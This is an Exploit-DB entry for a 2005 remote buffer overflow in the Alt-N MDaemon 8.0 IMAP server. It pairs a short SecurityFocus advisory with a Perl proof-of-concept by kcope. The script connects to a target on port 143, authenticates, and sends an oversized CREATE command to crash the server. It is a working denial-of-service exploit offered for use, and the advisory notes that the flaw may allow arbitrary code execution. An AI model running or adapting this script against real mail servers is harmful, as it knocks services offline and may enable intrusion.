Alt-N MDaemon 8.0 - IMAP Server CREATE Remote Buffer Overflow (PoC)

EDB-ID:

26005

CVE:

N/A

EDB Verified:

Author:

kcope

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2005-07-19

Vulnerable App: 
source: https://www.securityfocus.com/bid/14315/info

Alt-N MDaemon IMAP Server is affected by a remote buffer overflow vulnerability.

This issue presents itself when an attacker submits excessive data through the CREATE command subsequent to authentication

This vulnerability may be leveraged to execute arbitrary code in the context of the server, facilitating unauthorized access to the affected computer.

Alt-N MDaemon 8.03 is reported to be vulnerable. Other versions are likely affected as well. 

### MDAEMON stack based buffer overflow
### Remote DoS exploit by kcope
use IO::Socket::INET;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                             PeerPort => '143',
                             Proto    => 'tcp');

$a = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\\" x 10;

print $sock "a001 LOGIN username password\r\n";
print $sock "a001 CREATE $a\r\n";

while (<$sock>) {
   print $_;
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services